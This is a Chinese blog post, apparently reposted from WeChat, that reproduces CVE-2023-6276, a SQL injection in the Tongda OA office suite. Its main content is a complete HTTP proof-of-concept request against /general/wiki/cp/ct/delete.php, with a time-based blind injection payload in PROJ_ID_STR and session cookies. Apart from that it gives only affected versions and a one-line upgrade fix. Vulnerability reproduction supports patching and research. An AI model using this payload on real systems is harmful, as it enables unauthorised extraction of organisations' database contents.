【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6276）

admin

103121
文章

87
评论

2023年12月21日10:03:07评论51 views字数 909阅读3分1秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。

官网：

https://www.tongda2000.com/

漏洞编号：

CVE-2023-6276

影响范围：

通达OA >= 2017版

通达OA < 11.10

复现环境：

通达OA 2017版

0X02 漏洞复现

漏洞利用需登录，还需要知识库权限。

POC：

GET /general/wiki/cp/ct/delete.php?PROJ_ID_STR=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 192.168.245.134Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=46fa1bcf; _csrf=fb9605328bee63ab5b949c268b858d698cf75170a848c7b0882a2b8a14d66f71a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22dJ8hKTNoKf_MTAQdu5ag7otcWNXsBgUm%22%3B%7D; creat_work=new; PHPSESSID=1nd5l05qk216bqs6snnm6f1nf6; SID_66=1ca61957Upgrade-Insecure-Requests: 1
看右下角延时

无知识库权限：

0X03 修复建议

更新至最新版！

0X04

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6276）

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6276）

速达软件 V.NET home接口处存在RCE漏洞

致远OA移动智能办公平台存在Session敏感信息泄露漏洞

【1day】畅捷通T+ keyEdit.aspx接口处存在SQL注入漏洞

AJ-Report开源数据大屏 verification 远程命令执行漏洞

【漏洞预警】runc <1.2.0-rc.1 systemd属性注入漏洞CVE-2024-3154

Primeton EOS Platform jmx反序列化远程代码执行

ZenTao(禅道)身份认证绕过漏洞 QVD-2024-15263(附工具)

【未公开】LiveGBS-信息泄漏-list

Jan 任意文件读取/下载(AFR/AFD) 漏洞

Jan 任意文件上传漏洞

发表评论